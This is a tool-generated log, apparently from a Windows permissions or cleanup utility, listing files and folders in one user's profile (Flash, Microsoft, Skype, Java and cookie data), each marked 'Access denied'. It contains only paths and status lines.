Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\tubemogul.com\PlayerLog.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\tubemogul.com\StreamMinerInfo.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\tubemogul.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\www.copacast.net\cpfuid.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\www.copacast.net
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\www.skype.com\download.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\www.skype.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\www.youtube.com\soundData.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\www.youtube.com\videostats.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT\www.youtube.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects\ZUJCLLHT
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\#SharedObjects
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#1.p6.webhosting.yahoo.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#1.p6.webhosting.yahoo.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#adcontent.videoegg.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#adcontent.videoegg.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#as1.suitesmart.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#as1.suitesmart.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#d.yimg.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#d.yimg.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#e.blip.tv\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#e.blip.tv
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#flash.quantserve.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#flash.quantserve.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#googleads.g.doubleclick.net\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#googleads.g.doubleclick.net
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#illumenix.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#illumenix.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#interclick.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#interclick.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#l.yimg.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#l.yimg.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#login.yahoo.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#login.yahoo.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#macromedia.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#macromedia.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#media.podaddies.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#media.podaddies.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#media.scanscout.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#media.scanscout.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#pic.wretch.cc\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#pic.wretch.cc
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#s.ytimg.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#s.ytimg.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#static.youku.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#static.youku.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#tubemogul.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#tubemogul.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#www.copacast.net\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#www.copacast.net
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#www.skype.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#www.skype.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#www.youtube.com\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#www.youtube.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com\support
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\macromedia.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\fpupdateax\fpupdateax.exe
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\www.macromedia.com\bin\fpupdateax
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\www.macromedia.com\bin
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player\www.macromedia.com
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia\Flash Player
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Macromedia
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\AddIns
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CLR Security Config\v1.1.4322\security.config
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CLR Security Config\v1.1.4322\security.config.cch
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CLR Security Config\v1.1.4322
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CLR Security Config\v2.0.50727.42
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CLR Security Config
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Credentials\S-1-5-21-484763869-1547161642-725345543-1004
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Credentials
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\3C83474D61E624A4F9844DF935AFE217
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\486CC6AFD08942336C61FCD401C4A1D1
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\5209B26A762CFE608406374019066239
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\60E31627FDA0A46932B0E5948949F2A5
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\6C68A73125F3238F044A8115D96841B6
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\74BFD122C0875EC75DBE5C6DB4C59019
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\7735880A01E3F94F763761958A7A8191
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\904590238400AD963F77FAAAADC9BAB5
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\A44F4E7CB3133FF765C39A53AD8FCFDD
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\A8FABA189DB7D25FBA7CAC806625FD30
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\CFC456E7E410D69E2C6F3E2DB75C7DB3
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\D9446DF6FD9BABE04CC252D4F0FB3D01
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\E6024EAC88E6B6165D49FE3C95ADD735
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content\F482C95F83F1B59228F1B1E720F2EDF1
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\Content
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\3C83474D61E624A4F9844DF935AFE217
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\486CC6AFD08942336C61FCD401C4A1D1
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\5209B26A762CFE608406374019066239
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\60E31627FDA0A46932B0E5948949F2A5
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\6C68A73125F3238F044A8115D96841B6
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\74BFD122C0875EC75DBE5C6DB4C59019
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\7735880A01E3F94F763761958A7A8191
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\904590238400AD963F77FAAAADC9BAB5
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\A44F4E7CB3133FF765C39A53AD8FCFDD
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\A8FABA189DB7D25FBA7CAC806625FD30
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\CFC456E7E410D69E2C6F3E2DB75C7DB3
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\D9446DF6FD9BABE04CC252D4F0FB3D01
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\E6024EAC88E6B6165D49FE3C95ADD735
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData\F482C95F83F1B59228F1B1E720F2EDF1
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache\MetaData
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\CryptnetUrlCache
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Crypto\RSA\S-1-5-21-484763869-1547161642-725345543-1004\6b29ae44e85efac3c72ff4d1865d73f1_c13babcd-f4ed-4fe6-a001-0d43b2202cdf
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Crypto\RSA\S-1-5-21-484763869-1547161642-725345543-1004\80442fc0e99db4760a22fffc9bf91c16_c13babcd-f4ed-4fe6-a001-0d43b2202cdf
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Crypto\RSA\S-1-5-21-484763869-1547161642-725345543-1004
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Crypto\RSA
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Crypto
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Excel\XLSTART
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Excel
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Internet Explorer\brndlog.bak
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Internet Explorer\brndlog.txt
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Internet Explorer\Desktop.htt
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Internet Explorer\Quick Launch\HP Rhapsody.lnk
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Internet Explorer\Quick Launch\Show Desktop.scf
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Internet Explorer\Quick Launch\Windows Media Player.lnk
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Internet Explorer\Quick Launch
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Internet Explorer
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Media Player\043EC59F.wpl
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Media Player
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\MMC
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Excel11.pip
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\MSO1033.acl
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\PowerP11.pip
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\%E9%9B%B2%E5%8D%97%E5%8D%81%E5%85%AB%E6%80%AA[1].LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\3J5FR5G4.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\Desktop.ini
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\Desktop.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\EV8BJ0PO.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\index.dat
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\JEVXPP3F.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\joyce_resume_1.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\Jspeed Communication 20090206[1].LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\Jspeed Introduction[1].LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\Jspeed_brief.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\jspeed_sales_commission_1.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\jspeed_sales_commission_marcel[1].LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\L0CRHLSH.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\Local Disk (C).LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\presentation.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\presentation_01_2009.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\presentation_09_2007.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\presentation_09_2007_tom.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\proposal.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\proposal_09_2007.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\QKYHV1C4.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\README.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\Removable Disk (E).LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\students%27shi2[1]1[1].LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\summary.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\summary_09_2007.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\summy_01_2009.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\summy_09_2007.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\Templates.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\xinstall.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\xseplabp.src.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent\?&??Nov-15.LNK
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Recent
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office\Word11.pip
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Office
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Proof\CUSTOM.DIC
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Proof
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Protect\CREDHIST
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Protect\S-1-5-21-484763869-1547161642-725345543-1004\a20006d5-f995-4c9a-a684-2e5839ed6773
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Protect\S-1-5-21-484763869-1547161642-725345543-1004\e922b02a-7ea3-4853-9be4-92d1b3ac1cfc
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Protect\S-1-5-21-484763869-1547161642-725345543-1004\ed10caae-a7f4-481c-82ca-611b8e48c957
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Protect\S-1-5-21-484763869-1547161642-725345543-1004\Preferred
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Protect\S-1-5-21-484763869-1547161642-725345543-1004
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Protect
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\SystemCertificates\My\Certificates
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\SystemCertificates\My\CRLs
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\SystemCertificates\My\CTLs
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\SystemCertificates\My
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\SystemCertificates
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Templates\Normal.dot
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Templates
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Word\STARTUP
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft\Word
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Microsoft
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\ScanSoft\PaperPort\9\Temp
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\ScanSoft\PaperPort\9
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\ScanSoft\PaperPort
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\ScanSoft
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\call256.dbb
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\callmember256.dbb
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\chat512.dbb
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\chatmember256.dbb
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\chatmsg256.dbb
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\chatmsg512.dbb
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\chatsync\16\16d63d02b1a47bd5.dat
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\chatsync\16
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\chatsync\36\360105a3197d6dfa.dat
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\chatsync\36
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\chatsync\39\394216494c2b0b38.dat
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\chatsync\39
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\chatsync\bf\bfa1b4e8cfe0dd53.dat
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\chatsync\bf
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\chatsync\f3\f346522b38d4a4a2.dat
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\chatsync\f3
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\chatsync
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\config.lck
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\config.xml
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\contactgroup256.dbb
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\dyncontent\bundle.dat
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\dyncontent\bundle.dat-journal
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\dyncontent
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\httpfe\cookies.dat
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\httpfe
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\index2.dat
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\profile256.dbb
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\user1024.dbb
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\user16384.dbb
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\user256.dbb
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\user4096.dbb
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99\voicemail
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\jamesho99
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\shared.lck
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype\shared.xml
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Skype
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\skypePM\2009-03-03-1.ezlog
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\skypePM\2009-03-03-2.ezlog
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\skypePM\2009-03-04-1.ezlog
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\skypePM
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\ext
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\file
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\rtidx1.jar-5f5f8254-40f11601.idx
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar\rtidx1.jar-5f5f8254-40f11601.zip
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\jar
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Sun\Java\Deployment\cache\javapi\v1.0\tmp
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Sun\Java\Deployment\cache\javapi\v1.0
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Sun\Java\Deployment\cache\javapi
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Sun\Java\Deployment\cache\tmp
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Sun\Java\Deployment\cache
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Sun\Java\Deployment\deployment.properties
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Sun\Java\Deployment\ext
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Sun\Java\Deployment\log\plugin150_06.trace
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Sun\Java\Deployment\log
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Sun\Java\Deployment\security
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Sun\Java\Deployment
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Sun\Java
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Sun
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Tanner EDA\SEditDockingLayout.xml
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Tanner EDA\sedit_demo.cfg
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\Tanner EDA
Status: Access denied

Object: C:\Documents and Settings\james\Application Data\winscp.rnd
Status: Access denied

Object: C:\Documents and Settings\james\Application Data
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\index.dat
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][2].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][2].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
Status: Access denied

Object: C:\Documents and Settings\james\Cookies\[emailprotected][1].txt
